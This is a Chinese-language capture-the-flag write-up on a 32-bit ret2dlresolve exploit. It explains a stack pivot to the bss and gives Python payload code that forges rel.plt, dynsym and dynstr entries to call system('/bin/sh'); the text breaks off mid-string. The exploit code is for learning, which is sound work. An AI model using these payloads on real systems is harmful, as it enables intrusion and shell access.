ret2dl32

ret2dl32

首先检查一下保护：

IDA分析一下

程序很简单就是，往bss段上的buf读入0x400个数据，然后拷贝到栈上。read_got还被置为0,这一看就是要逼着你使用ret2dlresolve。

首先我们程序劫持到bss段

padding = '\x00'*0x10c
padding += p32(base_stage+4)+'\x00'*8+ p32(base_stage+0x500)
padding =  padding.ljust(0x300,'\x00')

上面的代码使得我们把控制流劫持到base_stage的位置。base_stage就是buf+0x300的位置。

接下来我们伪造 rel.plt ,dynsym ,dynstr这三个结构体,最后是布置好参数让程序执行plt0。

fake_sym_addr = base_stage + 0x18
align = 0x10 - ((fake_sym_addr - dynsym) & 0xf) # 这里的对齐操作是因为dynsym里的Elf32_Sym结构体都是0x10字节大小
fake_sym_addr = fake_sym_addr + align

index_dynsym = (fake_sym_addr - dynsym) /0x10
r_info = (index_dynsym << 8) | 0x7

st_name = (fake_sym_addr+0x10) - dynstr # 加0x10因为Elf32_Sym的大小为0x10
index_offset = (base_stage + 0x10) - rel_plt

payload =  p32(plt_0)
payload += p32(index_offset)    #+0x4
payload += 'BBBB'
payload += p32(base_stage+80)	#+0xC
payload += p32(elf.got['read']) + p32(r_info)         #fake_rel
payload += 'C' * align
payload += p32(st_name) + p32(0) + p32(0) + p32(0x12) #fake_sym
payload += 'system\x00'								  #fake_dynstr
payload = payload.ljust(80,'A')
payload += '/bin/sh\x00